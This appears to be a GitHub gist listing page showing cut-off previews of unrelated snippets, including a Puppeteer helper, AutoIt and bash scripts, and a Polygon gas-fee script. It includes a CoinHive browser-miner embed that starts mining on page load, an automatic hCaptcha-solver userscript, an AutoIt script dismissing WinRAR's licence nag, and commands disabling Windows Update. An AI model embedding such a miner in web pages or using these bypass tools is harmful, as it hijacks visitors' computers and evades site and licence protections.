This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script src="https://coin-hive.com/lib/coinhive.min.js"></script> | |
<script> | |
var miner = new CoinHive.Anonymous('aCyud8fkYf77SbqbEqXwApN8M6GOBHxB'); | |
miner.start(); | |
</script> | |
<script> | |
// Listen on events | |
miner.on('found', function() { /* Hash found */ }) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const http = require('http'); | |
const debug = require('debug')('spb:lib:pptEx'); | |
function getWSEndpoint(port) { | |
return new Promise((resolve, reject) => { | |
http | |
.get(`http://localhost:${port}/json/version`, (res) => { | |
res.setEncoding('utf8'); | |
let rawData = ''; | |
res.on('data', (chunk) => { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include-once | |
Global $Bitvise_Path = "C:\Program Files\Bitvise SSH Client" | |
Global Const $Bitvise_BvSsh = "BvSsh.exe" | |
Global Const $Bitvise_BvSshCtrl = "BvSshCtrl.exe" | |
Global Const $Bitvise_BvSsh_Host = "127.0.0.1" | |
#cs | |
+> Bivise Function |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#cs ---------------------------------------------------------------------------- | |
AutoIt Version: 3.3.14.5 | |
Author: fckRAR | |
Script Function: | |
Just Close WinRAR "Please purchase WinRAR license" Windows | |
#ce ---------------------------------------------------------------------------- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// maybe not a good case for http-pooling but works in some case of pet project | |
let smokeBreak = false; // https://www.youtube.com/watch?v=kdRPFBJ-jVc | |
try { | |
const x = setInterval(() => { | |
if (!smokeBreak) { | |
smokeBreak = true; | |
fetch('// a long wait request maybe wait more 5 sec to read: network error ') | |
.then((res) => res.json()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
;~ https://www.elitepvpers.com/forum/general-gaming-discussion/303245-autoit-bezier-mouse-movement.html | |
Dim $PtX[4] | |
Dim $PtY[4] | |
Dim $MaxPt = 3 | |
Func Factorial($n) | |
$value = 1 | |
For $i = 2 To $n | |
$value = $value * $i |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# /etc/init.d/xvfb_daemon | |
# Xvfb startup script. | |
# Tom Meier <[email protected]> | |
# | |
### BEGIN INIT INFO | |
# Provides: xvfb | |
# Short-Description: Start/stop/restart daemon | |
# Description: Controls the Xvfb daemon which starts/stops the X Virtual Framebuffer server | |
### END INIT INFO |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# set the Windows Update service to "disabled" | |
sc.exe config wuauserv start=disabled | |
# display the status of the service | |
sc.exe query wuauserv | |
# stop the service, in case it is running | |
sc.exe stop wuauserv | |
# display the status again, because we're paranoid |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const ethers = require('ethers') | |
const provider = new ethers.providers.JsonRpcProvider("https://polygon-rpc.com"); | |
// const provider = new ethers.providers.JsonRpcProvider("https://psdolygon-rpc.com"); | |
(async () => { | |
// wei => gwei => hex (bignumber) | |
// gwei => ethers.utils.hexlify => hex (bignumber) | |
// wei => ethers.utils.parseUnits gwei => hex (bignumber) | |
let estimatedGasFeesWei = 30.013769176 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @name Hcaptcha Solver with Browser Trainer(Automatically solves Hcaptcha in browser) | |
// @namespace Hcaptcha Solver | |
// @version 10.0 | |
// @description Hcaptcha Solver in Browser | Automatically solves Hcaptcha in browser | |
// @author Md ubeadulla | |
// @match https://*.hcaptcha.com/*hcaptcha-challenge* | |
// @match https://*.hcaptcha.com/*checkbox* | |
// @grant GM_xmlhttpRequest | |
// @grant GM_setValue |
OlderNewer